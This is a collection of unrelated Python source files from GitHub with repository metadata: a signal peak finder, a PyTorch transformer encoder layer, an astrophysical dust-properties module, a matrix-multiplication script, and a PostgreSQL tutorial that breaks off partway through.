CourseGrading/7.1.11插入字符.py
7.1.11插入字符.py
py
995
python
zh
code
3
github-code
36
43540671742
""" """ import numpy as np from scipy.signal import find_peaks_cwt from scipy.ndimage import gaussian_filter1d def peak_finder( curve:np.ndarray, smoothing_factor:float=21.0, )->np.ndarray: """ """ min_width = int(curve.size/20) max_width = int(curve.size/5) resolution = int((max_width - min_width)/19) peak_width = np.arange(min_width,max_width,resolution) new_curve = gaussian_filter1d(curve,sigma=smoothing_factor) indx = find_peaks_cwt(new_curve,peak_width) return indx
chriswilly/design_patterns
data_science/misc.py
misc.py
py
528
python
en
code
1
github-code
36
11249142498
import torch
import copy
import numpy as np
from torch import nn
from torch.nn import Dropout
from torch.nn import Linear
from torch.nn import LayerNorm
from torch.nn import functional as F

from RprMultiheadAttention import MultiheadAttention


def _get_activation_fn(activation):
    """Map an activation name ('relu' or 'gelu') to its functional form."""
    if activation == "relu":
        return F.relu
    elif activation == "gelu":
        return F.gelu
    else:
        raise RuntimeError("activation should be relu/gelu, not %s." % activation)


def _idx_clip(x, k):
    """Clip a relative position ``x`` to the window [-k, k]."""
    return max(-k, min(k, x))


class MemTransformerEncoderLayer(torch.nn.Module):
    """TransformerEncoderLayer is made up of self-attn and feedforward network.
    This standard encoder layer is based on the paper "Attention Is All You Need".
    Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,
    Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in
    Neural Information Processing Systems, pages 6000-6010. Users may modify or implement
    in a different way during application.

    Args:
        d_model: the number of expected features in the input (required).
        nhead: the number of heads in the multiheadattention models (required).
        frame_len: sequence length used to build the relative-position table (default=29).
        dim_feedforward: the dimension of the feedforward network model (default=2048).
        dropout: the dropout value (default=0.1).
        activation: the activation function of intermediate layer, relu or gelu (default=relu).

    Examples::
        >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)
        >>> src = torch.rand(10, 32, 512)
        >>> out = encoder_layer(src)
    """

    def __init__(self, d_model, nhead, frame_len=29, dim_feedforward=2048, dropout=0.1,
                 activation="relu"):
        super(MemTransformerEncoderLayer, self).__init__()
        self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout)
        # Implementation of Feedforward model
        self.linear1 = Linear(d_model, dim_feedforward)
        self.dropout = Dropout(dropout)
        self.linear2 = Linear(dim_feedforward, d_model)

        self.norm1 = LayerNorm(d_model)
        self.norm2 = LayerNorm(d_model)
        self.dropout1 = Dropout(dropout)
        self.dropout2 = Dropout(dropout)

        self.activation = _get_activation_fn(activation)

        # Relative position representation (rpr) encoding: one learned key
        # and one learned value embedding per clipped relative offset in
        # [-k, k], i.e. 2k + 1 entries (Shaw et al. style).
        self.frame_len = frame_len
        self.k = 5
        self.create_rpr_table(self.k)
        self.pk_embed = nn.Embedding(2 * self.k + 1, d_model)
        self.pv_embed = nn.Embedding(2 * self.k + 1, d_model)

    def create_rpr_table(self, k):
        """Precompute the frame_len x frame_len table of clipped relative
        offsets, shifted by +k so entries index into [0, 2k]."""
        self.rpr_table = np.zeros((self.frame_len, self.frame_len))
        for i in range(1, self.frame_len + 1):
            for j in range(1, self.frame_len + 1):
                # Originally called an unqualified class-level ``idx_clip``,
                # which raised NameError; use the module-level helper.
                self.rpr_table[i - 1, j - 1] = _idx_clip(j - i, k) + k
        return

    def forward(self, src, src_mask=None, src_key_padding_mask=None):
        r"""Pass the input through the encoder layer.

        Args:
            src: the sequnce to the encoder layer (required).
            src_mask: the mask for the src sequence (optional).
            src_key_padding_mask: the mask for the src keys per batch (optional).

        Shape:
            see the docs in Transformer class.
        """
        # posk/posv were referenced but never defined in the original.
        # NOTE(review): assumed to be the per-offset key/value embeddings
        # looked up from the precomputed rpr table, matching the extra
        # positional arguments of the project's custom MultiheadAttention —
        # confirm against RprMultiheadAttention's signature.
        rpr_idx = torch.as_tensor(self.rpr_table, dtype=torch.long,
                                  device=src.device)
        posk = self.pk_embed(rpr_idx)
        posv = self.pv_embed(rpr_idx)

        src2 = self.self_attn(src, src, src, posk, posv, attn_mask=src_mask,
                              key_padding_mask=src_key_padding_mask)[0]
        src = src + self.dropout1(src2)
        src = self.norm1(src)
        if hasattr(self, "activation"):
            src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))
        else:  # for backward compatibility
            src2 = self.linear2(self.dropout(F.relu(self.linear1(src))))
        src = src + self.dropout2(src2)
        src = self.norm2(src)
        return src
perathambkk/lipreading
short1.27fast_nlls_xl_2mem_lattransconv_p_OSL_500_cosine/RprTransformerEncoderLayer.py
RprTransformerEncoderLayer.py
py
3,370
python
en
code
3
github-code
36
37412068955
############################################################################## # # File format versions: # # 1: initial version # # 2: now contains reciprocal planck opacity and rosseland opacity # previous rosseland opacity was actually reciprocal planck opacity # ############################################################################## from __future__ import print_function, division import os import hashlib import h5py import numpy as np from astropy import log as logger import six from ..version import __version__ from ..util.constants import c from ..util.functions import FreezableClass from ..util.interpolate import interp1d_fast_loglog from ..util.integrate import integrate_loglog from ..util.nans import check_for_nans from .optical_properties import OpticalProperties from .emissivities import Emissivities from .mean_opacities import MeanOpacities def henyey_greenstein(mu, g, p_lin_max): P1 = (1. - g * g) / (1. + g * g - 2. * g * mu) ** 1.5 P2 = - p_lin_max * P1 * (1. - mu * mu) / (1. + mu * mu) P3 = P1 * 2. * mu / (1. + mu * mu) P4 = 0. return P1, P2, P3, P4 class SphericalDust(FreezableClass): r""" This class should be used in cases where fully arbitrary dust properties need to be specified, within the framework of randomly oriented grains, which means that the scattering phase function has the general form: .. math:: R(\theta) = \left[\begin{array}{cccc}P_1 & P_2 & 0 & 0 \\P_2 & P_1 & 0 & 0 \\0 & 0 & P_3 & -P_4 \\0 & 0 & P_4 & P_3\end{array}\right] This class is initialized with:: d = SphericalDust() and the properties should then be set manually. See `here <http://docs.hyperion-rt.org/en/stable/setup/setup_dust.html#fully-customized-4-element-dust>`_ for a description of the available properties and how to set them. """ def __init__(self, *args): self._file = None self.md5 = None self.optical_properties = OpticalProperties() self.mean_opacities = MeanOpacities() self.emissivities = Emissivities() self.set_sublimation_specific_energy('no', 0.) 
self._freeze() if len(args) == 0: pass elif len(args) == 1: self.read(args[0]) else: raise Exception("SphericalDust cannot take more than one argument") def hash(self): h = hashlib.md5() if self.optical_properties is None or not self.optical_properties.all_set(): h.update('none'.encode('utf-8')) else: h.update(self.optical_properties.hash().encode('utf-8')) if self.emissivities is None or not self.emissivities.all_set(): h.update('none'.encode('utf-8')) else: h.update(self.emissivities.hash().encode('utf-8')) if self.mean_opacities is None or not self.mean_opacities.all_set(): h.update('none'.encode('utf-8')) else: h.update(self.mean_opacities.hash().encode('utf-8')) import struct h.update(self.sublimation_mode.encode('utf-8')) h.update(struct.pack('>d', self.sublimation_energy)) return h.hexdigest() def set_lte_emissivities(self, n_temp=1200, temp_min=0.1, temp_max=100000.): ''' Calculate the emissivities assuming LTE Parameters ---------- n_temp : int, optional The number of temperatures to calculate the emissivities for temp_min : float, optional The minimum temperature to calculate the emissivities for temp_max : float, optional The maximum temperature to calculate the emissivities for ''' self.mean_opacities.compute(self.optical_properties, n_temp=n_temp, temp_min=temp_min, temp_max=temp_max) self.emissivities.set_lte(self.optical_properties, self.mean_opacities) def plot(self, filename): # Check that the optical properties have been set self.optical_properties.ensure_all_set() import matplotlib.pyplot as plt # Save original rc parameters rc_orig = plt.rcParams # Reset to defaults plt.rcdefaults() plt.rc('legend', fontsize=7) plt.rc('axes', titlesize='x-small') plt.rc('axes', labelsize='x-small') plt.rc('xtick', labelsize='xx-small') plt.rc('ytick', labelsize='xx-small') plt.rc('axes', linewidth=0.5) plt.rc('patch', linewidth=0.5) # Compute mean opacities if not already existent self._compute_mean_opacities() # Check that emissivities are set (before computing 
mean opacities) if not self.emissivities.all_set(): logger.info("Computing emissivities assuming LTE") self.emissivities.set_lte(self.optical_properties, self.mean_opacities) # Initialize figure fig = plt.figure(figsize=(10, 12)) # Plot optical properties fig = self.optical_properties.plot(fig, [421, 423, 424, 425, 426]) # Plot mean opacities fig = self.mean_opacities.plot(fig, 428) # Plot emissivities fig = self.emissivities.plot(fig, 427) # Adjust spacing between subplots fig.subplots_adjust(left=0.08, right=0.92, wspace=0.22, hspace=0.30) # Save figure fig.savefig(filename, bbox_inches='tight') # Close figure to save RAM plt.close(fig) # Restore rc parameters plt.rc(rc_orig) def set_sublimation_temperature(self, mode, temperature=0.): ''' Set the dust sublimation mode and temperature. Parameters ---------- mode : str The dust sublimation mode, which can be: * 'no' - no sublimation * 'fast' - remove all dust in cells exceeding the sublimation temperature * 'slow' - reduce the dust in cells exceeding the sublimation temperature * 'cap' - any temperature exceeding the sublimation temperature is reset to the sublimation temperature. temperature : float, optional The dust sublimation temperature, in K ''' if mode not in ['no', 'fast', 'slow', 'cap']: raise Exception("mode should be one of no/fast/slow/cap") if mode != 'no' and temperature is None: raise Exception("Need to specify a sublimation temperature") self.sublimation_mode = mode self.sublimation_energy = self.temperature2specific_energy(temperature) def set_sublimation_specific_energy(self, mode, specific_energy=0.): ''' Set the dust sublimation mode and specific energy. 
Parameters ---------- mode : str The dust sublimation mode, which can be: * 'no' - no sublimation * 'fast' - remove all dust in cells exceeding the sublimation specific energy * 'slow' - reduce the dust in cells exceeding the sublimation specific energy * 'cap' - any specific energy exceeding the sublimation specific energy is reset to the sublimation specific energy. specific_energy : float, optional The dust sublimation specific energy, in cgs ''' if mode not in ['no', 'fast', 'slow', 'cap']: raise Exception("mode should be one of no/fast/slow/cap") if mode != 'no' and specific_energy is None: raise Exception("Need to specify a sublimation specific_energy") self.sublimation_mode = mode self.sublimation_energy = specific_energy def _write_dust_sublimation(self, group): group.attrs['sublimation_mode'] = np.string_(self.sublimation_mode) if self.sublimation_mode in ['slow', 'fast', 'cap']: group.attrs['sublimation_specific_energy'] = self.sublimation_energy def _read_dust_sublimation(self, group): if 'sublimation_mode' in group.attrs: self.sublimation_mode = group.attrs['sublimation_mode'].decode('ascii') if self.sublimation_mode in ['slow', 'fast', 'cap']: self.sublimation_energy = group.attrs['sublimation_specific_energy'] def _compute_mean_opacities(self): if not self.mean_opacities.all_set(): self.mean_opacities.compute(self.optical_properties) def write(self, filename, compression=True): ''' Write out to a standard dust file, including calculations of the mean opacities and optionally thermal emissivities. 
''' # Check that the optical properties have been set self.optical_properties.ensure_all_set() # Compute mean opacities if not already existent self._compute_mean_opacities() # Check that emissivities are set (before computing mean opacities) if not self.emissivities.all_set(): logger.info("Computing emissivities assuming LTE") self.emissivities.set_lte(self.optical_properties, self.mean_opacities) # Create dust table set if isinstance(filename, six.string_types): dt = h5py.File(filename, 'w') else: dt = filename # Add standard keywords to header dt.attrs['version'] = 2 dt.attrs['type'] = 1 dt.attrs['python_version'] = np.string_(__version__) if self.md5: dt.attrs['asciimd5'] = np.string_(self.md5) # Add optical properties and scattering angle tables self.optical_properties.to_hdf5_group(dt) # Add mean opacities table self.mean_opacities.to_hdf5_group(dt) # Add emissivities and emissivity variable tables self.emissivities.to_hdf5_group(dt) # Dust sublimation parameters self._write_dust_sublimation(dt) # Check that there are no NaN values in the file - if there are, a # warning is emitted. 
check_for_nans(dt) # Close dust file if isinstance(dt, h5py.File): dt.close() self._file = (filename, self.hash()) def read(self, filename): ''' Read in from a standard dust file ''' from ..util.functions import asstr if isinstance(filename, six.string_types): # Check file exists if not os.path.exists(filename): raise Exception("File not found: %s" % filename) # Read in dust table set dt = h5py.File(filename, 'r') close = True else: # Read in dust table set dt = filename close = False # Check version and type if dt.attrs['version'] not in [1, 2]: raise Exception("Version should be 1 or 2") if dt.attrs['type'] != 1: raise Exception("Type should be 1") if 'asciimd5' in dt.attrs: self.md5 = asstr(dt.attrs['asciimd5']) else: self.md5 = None # Read in the optical properties self.optical_properties.from_hdf5_group(dt) # Read in the planck and rosseland mean opacities if dt.attrs['version'] == 1: logger.warning("Version 1 dust file detected - discarding mean opacities and recomputing them") self.mean_opacities.compute(self.optical_properties) else: self.mean_opacities.from_hdf5_group(dt) # Read in emissivities self.emissivities.from_hdf5_group(dt) # Dust sublimation parameters self._read_dust_sublimation(dt) # Close file object if needed if close: dt.close() self._file = (filename, self.hash()) def chi_nu_temperature(self, temperature): """ Compute the mean opacity to extinction for a blackbody at a given temperature. Parameters ---------- temperature : float The temperature of the blackbody to use Returns ------- chi_nu_mean : float The mean opacity to extinction """ self._compute_mean_opacities() return interp1d_fast_loglog(self.mean_opacities.temperature, self.mean_opacities.chi_planck, temperature, bounds_error=True) def kappa_nu_temperature(self, temperature): """ Compute the mean opacity to absorption for a blackbody at a given temperature. 
Parameters ---------- temperature : float The temperature of the blackbody to use Returns ------- kappa_nu_mean : float The mean opacity to absorption """ self._compute_mean_opacities() return interp1d_fast_loglog(self.mean_opacities.temperature, self.mean_opacities.kappa_planck, temperature, bounds_error=True) def chi_nu_spectrum(self, nu, fnu): """ Compute the mean opacity to extinction for a given spectrum. Parameters ---------- nu : array_like The frequencies, in Hz fnu : array_like The monochromatic fluxes per unit frequency. Units are unimportant since proportionality constants are cancelled out in the computation. Returns ------- chi_nu_mean : float The mean opacity to extinction """ if nu.max() > self.optical_properties.nu.max() or nu.min() < self.optical_properties.nu.min(): raise Exception("Opacity to extinction is not defined at all " "spectrum frequencies") chi_nu = self.optical_properties.interp_chi_nu(nu) return (integrate_loglog(nu, fnu * chi_nu) / integrate_loglog(nu, fnu)) def kappa_nu_spectrum(self, nu, fnu): """ Compute the mean opacity to absorption for a given spectrum. Parameters ---------- nu : array_like The frequencies, in Hz fnu : array_like The monochromatic fluxes per unit frequency. Units are unimportant since proportionality constants are cancelled out in the computation. Returns ------- kappa_nu_mean : float The mean opacity to absorption """ if nu.max() > self.optical_properties.nu.max() or nu.min() < self.optical_properties.nu.min(): raise Exception("Opacity to absorption is not defined at all " "spectrum frequencies") kappa_nu = self.optical_properties.interp_kappa_nu(nu) return (integrate_loglog(nu, fnu * kappa_nu) / integrate_loglog(nu, fnu)) def temperature2specific_energy(self, temperature): """ Convert a temperature to its corresponding specific energy value. 
Parameters ---------- temperature : float or array_like The temperature to convert Returns ------- specific_energy : float or array_like The specific energy corresponding to the input temperature """ self._compute_mean_opacities() specific_energy = interp1d_fast_loglog(self.mean_opacities.temperature, self.mean_opacities.specific_energy, temperature, bounds_error=False, fill_value=np.nan) if np.isscalar(temperature): if temperature < self.mean_opacities.temperature[0]: specific_energy = self.mean_opacities.specific_energy[0] elif temperature > self.mean_opacities.temperature[-1]: specific_energy = self.mean_opacities.specific_energy[-1] else: specific_energy[temperature < self.mean_opacities.temperature[0]] = self.mean_opacities.specific_energy[0] specific_energy[temperature > self.mean_opacities.temperature[-1]] = self.mean_opacities.specific_energy[-1] return specific_energy def specific_energy2temperature(self, specific_energy): """ Convert a specific energy value to its corresponding temperature. 
Parameters ---------- specific_energy : float or array_like The specific energy to convert Returns ------- temperature : float or array_like The temperature corresponding to the input specific energy """ self._compute_mean_opacities() temperature = interp1d_fast_loglog(self.mean_opacities.specific_energy, self.mean_opacities.temperature, specific_energy, bounds_error=False, fill_value=np.nan) if np.isscalar(specific_energy): if specific_energy < self.mean_opacities.specific_energy[0]: temperature = self.mean_opacities.temperature[0] elif specific_energy > self.mean_opacities.specific_energy[-1]: temperature = self.mean_opacities.temperature[-1] else: temperature[specific_energy < self.mean_opacities.specific_energy[0]] = self.mean_opacities.temperature[0] temperature[specific_energy > self.mean_opacities.specific_energy[-1]] = self.mean_opacities.temperature[-1] return temperature class IsotropicDust(SphericalDust): """ This class should be used for dust properties that include isotropic scattering. The dust properties should be instatiated as:: d = IsotropicDust(nu, albedo, chi) where ``nu``, ``albedo``, and ``chi`` are 1-D Numpy arrays containing the frequencies, albedo, and opacity to extinction respectively. """ def __init__(self, nu, albedo, chi): SphericalDust.__init__(self) # Set cos(theta) grid for computing the scattering matrix elements self.optical_properties.mu = np.linspace(-1., 1., 2) # Set optical properties self.optical_properties.nu = nu self.optical_properties.albedo = albedo self.optical_properties.chi = chi # Compute scattering matrix elements self.optical_properties.initialize_scattering_matrix() # Set scattering matrix to isotropic values self.optical_properties.P1[:, :] = 1. self.optical_properties.P2[:, :] = 0. self.optical_properties.P3[:, :] = 1. self.optical_properties.P4[:, :] = 0. 
# Sort optical properties self.optical_properties._sort() class HenyeyGreensteinDust(SphericalDust): """ This class should be used for dust properties that include scattering parameterized by the `Henyey-Greenstein, 1941 <http://dx.doi.org/10.1086/144246>`_ function. The dust properties should be instatiated as:: d = HenyeyGreensteinDust(nu, albedo, chi, g, p_lin_max) where ``nu``, ``albedo``, and ``chi`` are 1-D Numpy arrays containing the frequencies, albedo, and opacity to extinction respectively, and ``g`` and ``p_lin_max`` are also 1-D Numpy arrays containing the asymmetry parameter and the maximum linear polarization. """ def __init__(self, nu, albedo, chi, g, p_lin_max): SphericalDust.__init__(self) # Set cos(theta) grid for computing the scattering matrix elements n_mu = 100 self.optical_properties.mu = np.linspace(-1., 1., n_mu) # Set optical properties self.optical_properties.nu = nu self.optical_properties.albedo = albedo self.optical_properties.chi = chi # Compute scattering matrix elements self.optical_properties.initialize_scattering_matrix() for i in range(n_mu): self.optical_properties.P1[:, i], \ self.optical_properties.P2[:, i], \ self.optical_properties.P3[:, i], \ self.optical_properties.P4[:, i] = henyey_greenstein(self.optical_properties.mu[i], g, p_lin_max) class HOCHUNKDust(HenyeyGreensteinDust): """ This class should be used for dust properties that include scattering parameterized by the `Henyey-Greenstein, 1941 <http://dx.doi.org/10.1086/144246>`_ function, which are formatted for the `HOCHUNK code <http://gemelli.colorado.edu/~bwhitney/codes/>`_. The dust properties should be instatiated as:: d = HOCHUNKDust(filename) where ``filename`` is the name of the file containing the dust properties in the HOCHUNK format. 
""" def __init__(self, filename): # Read in dust file dustfile = np.loadtxt(filename, dtype=[('wav', float), ('c_ext', float), ('c_sca', float), ('chi', float), ('g', float), ('p_lin_max', float)], usecols=[0, 1, 2, 3, 4, 5]) # Ensure file is ordered in increasing frequency if dustfile['wav'][-1] > dustfile['wav'][0]: dustfile = dustfile[::-1] # Compute frequency and albedo nu = c / dustfile['wav'] * 1.e4 albedo = dustfile['c_sca'] / dustfile['c_ext'] self.md5 = hashlib.md5(open(filename, 'rb').read()).hexdigest() HenyeyGreensteinDust.__init__(self, nu, albedo, dustfile['chi'], dustfile['g'], dustfile['p_lin_max']) TTsreDust = HOCHUNKDust class CoatsphSingle(SphericalDust): def __init__(self, directory, size, density): ''' Initialize single-component dust. Parameters ---------- directory : str Directory containing all the files describing the dust size : float Grain size, in cm density : float Dust grain density, in g/cm^3 ''' SphericalDust.__init__(self) f = open('%s/coatsph_forw.dat' % directory, 'rb') version = f.readline() n_components = int(f.readline().strip().split()[5]) # Read in main dust file dustfile = np.loadtxt(f, skiprows=3, dtype=[('x', float), ('radius', float), ('wav', float), ('q_ext', float), ('q_sca', float), ('q_back', float), ('g', float)]) n_wav = len(dustfile) self.optical_properties.nu = c / dustfile['wav'] * 1.e4 self.optical_properties.albedo = dustfile['q_sca'] / dustfile['q_ext'] self.optical_properties.chi = 0.75 * dustfile['q_ext'] / size / density # Read in scattering matrix elements for i in range(n_wav): filename = '%s/coatsph_scat_%04i_0001.dat' % (directory, i + 1) phasefile = np.loadtxt(filename, skiprows=9, dtype=[('theta', float), ('s11', float), ('polariz', float), ('s12', float), ('s33', float), ('s34', float)]) if i == 0: self.optical_properties.mu = np.cos(np.radians(phasefile['theta'])) self.optical_properties.initialize_scattering_matrix() self.optical_properties.P1[i, :] = phasefile['s11'] self.optical_properties.P2[i, 
:] = phasefile['s12'] self.optical_properties.P3[i, :] = phasefile['s33'] self.optical_properties.P4[i, :] = phasefile['s34'] class CoatsphMultiple(SphericalDust): def __init__(self, directory): ''' Initialize multi-component dust. Parameters ---------- directory : str Directory containing all the files describing the dust ''' SphericalDust.__init__(self) f = open('%s/coatsph_forw.dat' % directory, 'rb') version = f.readline() n_components = int(f.readline().strip().split()[5]) # Read in main dust file dustfile = np.loadtxt(f, skiprows=7, dtype=[('wav', float), ('c_ext', float), ('c_sca', float), ('chi', float), ('g', float), ('pmax', float), ('thetmax', float)]) n_wav = len(dustfile) self.optical_properties.nu = c / dustfile['wav'] * 1.e4 self.optical_properties.albedo = dustfile['c_sca'] / dustfile['c_ext'] self.optical_properties.chi = dustfile['chi'] # Read in scattering matrix elements for i in range(n_wav): filename = '%s/coatsph_scat.%04i.dat' % (directory, i + 1) phasefile = np.loadtxt(filename, skiprows=7, dtype=[('theta', float), ('s11', float), ('polariz', float), ('s12', float), ('s33', float), ('s34', float)]) if i == 0: self.optical_properties.mu = np.cos(np.radians(phasefile['theta'])) self.optical_properties.initialize_scattering_matrix() self.optical_properties.P1[i, :] = phasefile['s11'] self.optical_properties.P2[i, :] = phasefile['s12'] self.optical_properties.P3[i, :] = phasefile['s33'] self.optical_properties.P4[i, :] = phasefile['s34'] class MieXDust(SphericalDust): def __init__(self, model): SphericalDust.__init__(self) wav = np.loadtxt('%s.alb' % model, usecols=[0]) self.optical_properties.albedo = np.loadtxt('%s.alb' % model, usecols=[1]) kappa = np.loadtxt('%s.k_abs' % model, usecols=[1]) self.optical_properties.chi = kappa / (1 - self.optical_properties.albedo) # Check for NaN values for quantity in ['chi', 'albedo']: values = self.optical_properties.__dict__[quantity] if np.any(np.isnan(values)): logger.warning("NaN values found inside 
MieX %s file - interpolating" % quantity) invalid = np.isnan(values) values[invalid] = interp1d_fast_loglog(wav[~invalid], values[~invalid], wav[invalid]) if np.any(np.isnan(values)): raise Exception("Did not manage to fix NaN values in MieX %s" % quantity) self.optical_properties.nu = c / wav * 1.e4 n_wav = len(wav) n_mu = (len(open('%s.f11' % model).readlines()) // n_wav) - 1 mu = np.zeros(n_mu) # Read mu f11 = open('%s.f11' % model) f11.readline() f11.readline() for i in range(n_mu): mu[i] = np.cos(np.radians(float(f11.readline().split()[0]))) f11.close() self.optical_properties.mu = mu[::-1] # Read in matrix elements self.optical_properties.initialize_scattering_matrix() f11 = open('%s.f11' % model) f12 = open('%s.f12' % model) f33 = open('%s.f33' % model) f34 = open('%s.f34' % model) f11.readline() f12.readline() f33.readline() f34.readline() for j in range(n_wav): if float(f11.readline()) != wav[j]: raise Exception("Incorrect wavelength in f11") if float(f12.readline()) != wav[j]: raise Exception("Incorrect wavelength in f12") if float(f33.readline()) != wav[j]: raise Exception("Incorrect wavelength in f33") if float(f34.readline()) != wav[j]: raise Exception("Incorrect wavelength in f34") for i in range(n_mu): self.optical_properties.P1[j, n_mu - i - 1] = float(f11.readline().split()[1]) self.optical_properties.P2[j, n_mu - i - 1] = float(f12.readline().split()[1]) self.optical_properties.P3[j, n_mu - i - 1] = float(f33.readline().split()[1]) self.optical_properties.P4[j, n_mu - i - 1] = float(f34.readline().split()[1]) for i in range(n_mu): for quantity in ['P1', 'P2', 'P3', 'P4']: values = self.optical_properties.__dict__[quantity] if np.any(np.isnan(values[:, i])): logger.warning("NaN values found inside MieX %s file - interpolating" % quantity) invalid = np.isnan(values[:, i]) values[:, i][invalid] = interp1d_fast_loglog(wav[~invalid], values[:, i][~invalid], wav[invalid]) if np.any(np.isnan(values[:, i])): raise Exception("Did not manage to fix NaN 
values in MieX %s" % quantity) class BHDust(SphericalDust): """ This class should be used for dust properties that were computed using `this dust calculation code <https://github.com/hyperion-rt/bhmie>`_ which is a wrapper to the ``bhmie`` routine originally written by C.F. Bohren and D. Huffman and improved by B. Draine. When using the ``bhmie`` code, you should set the output format to ``2``, which will create a number of files ending in ``.wav``, ``.mu``, ``.alb``, etc. Then, instantiate this class with the name of the directory containing these output files along with the prefix used. For example, if you use ``directory/mydust`` as a prefix in ``bhmie``, you can import this dust with:: >>> from hyperion.dust import BHDust >>> d = BHDust('directory/mydust') """ def __init__(self, model): SphericalDust.__init__(self) mu = np.loadtxt('%s.mu' % model) nu = c / np.loadtxt('%s.wav' % model) * 1.e4 albedo = np.loadtxt('%s.alb' % model) chi = np.loadtxt('%s.chi' % model) P1 = np.loadtxt('%s.f11' % model) P2 = np.loadtxt('%s.f12' % model) P3 = np.loadtxt('%s.f33' % model) P4 = np.loadtxt('%s.f34' % model) if nu[-1] < nu[0]: nu = nu[::-1] albedo = albedo[::-1] chi = chi[::-1] P1 = P1[::-1, :] P2 = P2[::-1, :] P3 = P3[::-1, :] P4 = P4[::-1, :] if mu[-1] < mu[0]: mu = mu[::-1] P1 = P1[:, ::-1] P2 = P2[:, ::-1] P3 = P3[:, ::-1] P4 = P4[:, ::-1] self.optical_properties.mu = mu self.optical_properties.nu = nu self.optical_properties.albedo = albedo self.optical_properties.chi = chi self.optical_properties.P1 = P1 self.optical_properties.P2 = P2 self.optical_properties.P3 = P3 self.optical_properties.P4 = P4
hyperion-rt/hyperion
hyperion/dust/dust_type.py
dust_type.py
py
31,342
python
en
code
51
github-code
36
71592645224
"""Multiply two matrices with the classic triple loop.

The original allocated the result matrix transposed
([[0]*rows_A]*columns_B) and iterated the outer index over columns_B
instead of rows_A — it only worked because the sample matrices are
square.  The logic now lives in a reusable, correctly-dimensioned
function.
"""

matrix_A = [
    [2, 0],
    [3, 0]]

matrix_B = [
    [1, 0],
    [1, 2]]


def multiply_matrices(a, b):
    """Return the matrix product a @ b as a list of lists.

    Raises ValueError when the inner dimensions do not match.
    """
    rows_a, cols_a = len(a), len(a[0])
    rows_b, cols_b = len(b), len(b[0])
    if cols_a != rows_b:
        # Same message the original script printed for this case.
        raise ValueError('No se puede muliplicar')
    # Result is rows_a x cols_b.
    result = [[0 for _ in range(cols_b)] for _ in range(rows_a)]
    for i in range(rows_a):
        for j in range(cols_b):
            for k in range(cols_a):
                result[i][j] += a[i][k] * b[k][j]
    return result


if __name__ == '__main__':
    rows_A = len(matrix_A)
    columns_A = len(matrix_A[0])
    columns_B = len(matrix_B[0])

    print(f' m: {rows_A}')
    print(f' n: {columns_A}')
    print(f' r: {columns_B}')

    try:
        print(multiply_matrices(matrix_A, matrix_B))
    except ValueError as error:
        print(error)
Gabospa/Matrix
multiplication.py
multiplication.py
py
688
python
en
code
1
github-code
36
42985186741
import psycopg2


def create_table(connection):
    """Create the students, courses and booking tables."""
    # The cursor is used to execute commands and read the response.
    cursor = connection.cursor()
    try:
        create_table_query = '''CREATE TABLE students
              (ID SERIAL PRIMARY KEY ,
              NAME TEXT NOT NULL,
              SURNAME TEXT NOT NULL,
              unique(NAME,SURNAME)); '''
        cursor.execute(create_table_query)

        create_table_query = '''CREATE TABLE courses
              (ID SERIAL PRIMARY KEY ,
              NAME TEXT NOT NULL,
              DESCR TEXT NOT NULL); '''
        cursor.execute(create_table_query)

        # booking is the many-to-many link between students and courses.
        create_table_query = '''CREATE TABLE booking
              (STUDENT_ID BIGINT ,
              COURSE_ID BIGINT ,
              PRIMARY KEY (STUDENT_ID,COURSE_ID),
              FOREIGN KEY (STUDENT_ID) REFERENCES students(ID) MATCH FULL ON DELETE CASCADE,
              FOREIGN KEY (COURSE_ID) REFERENCES courses(ID) MATCH FULL ON DELETE CASCADE
              ); '''
        cursor.execute(create_table_query)

        # Make the changes permanent.
        connection.commit()
    except (Exception, psycopg2.Error) as error:
        print("Error creating tables", error)
    finally:
        # Always close the cursor.
        cursor.close()


def insert_names(connection):
    """Insert a few sample students."""
    cursor = connection.cursor()
    try:
        nomi = [("Marco", "Torlaschi"), ("Roberta", "Latini"), ("Giorgo", "Franzini")]
        # Generic statement with %s placeholders; values are bound at execution time.
        insert = "INSERT INTO students (NAME,SURNAME) VALUES (%s,%s)"
        for n in nomi:
            cursor.execute(insert, n)
        connection.commit()
    except (Exception, psycopg2.Error) as error:
        print("Error inserting names", error)
    finally:
        cursor.close()


def insert_courses(connection):
    """Insert a few sample courses."""
    cursor = connection.cursor()
    try:
        corsi = [("SQL", "corso sql"), ("SPRING", "corso spring")]
        insert = "INSERT INTO courses (NAME,DESCR) VALUES (%s,%s)"
        for n in corsi:
            cursor.execute(insert, n)
        connection.commit()
    except (Exception, psycopg2.Error) as error:
        print("Error inserting names", error)
    finally:
        cursor.close()


def insert_booking(connection, name, surname, course):
    """Book *course* for the student identified by *name* and *surname*."""
    cursor = connection.cursor()
    try:
        cursor.execute("SELECT ID FROM students WHERE NAME=%s AND SURNAME=%s",
                       (name, surname))
        student_id = cursor.fetchone()[0]
        cursor.execute("SELECT ID FROM courses WHERE NAME = %s ", (course,))
        course_id = cursor.fetchone()[0]
        cursor.execute("INSERT INTO booking (STUDENT_ID,COURSE_ID) VALUES (%s,%s)",
                       (str(student_id), str(course_id)))
        connection.commit()
    except (Exception, psycopg2.Error) as error:
        print("Error inserting bookings", error)
    finally:
        cursor.close()


def delate_names(connection):
    """Delete the sample student named Roberta.

    Bug fix: the original signature took a misspelled ``connetion``
    parameter and silently used the module-level ``connection`` global
    instead; it now really uses its argument. (Function name kept as-is
    for existing callers.)
    """
    cursor = connection.cursor()
    try:
        cursor.execute("DELETE FROM students where name='Roberta' ")
        connection.commit()
    except (Exception, psycopg2.Error) as error:
        print("Error deleting name", error)
    finally:
        cursor.close()


def drop_tables(connection):
    """Drop the three tables (booking first because of its foreign keys).

    Bug fix: same misspelled-parameter/global-shadowing issue as
    ``delate_names`` — the function now uses its argument.
    """
    cursor = connection.cursor()
    try:
        cursor.execute("DROP TABLE booking ")
        cursor.execute("DROP TABLE students ")
        cursor.execute("DROP TABLE courses ")
        connection.commit()
    except (Exception, psycopg2.Error) as error:
        print("Error deleting name", error)
    finally:
        cursor.close()


if __name__ == '__main__':
    print("esempi sql")
    # Bug fix: pre-bind so the `finally` block below cannot raise
    # NameError when psycopg2.connect() itself fails.
    connection = None
    try:
        # Open the connection.
        connection = psycopg2.connect(user="postgres",
                                      password="password",
                                      host="127.0.0.1",
                                      port="5432",
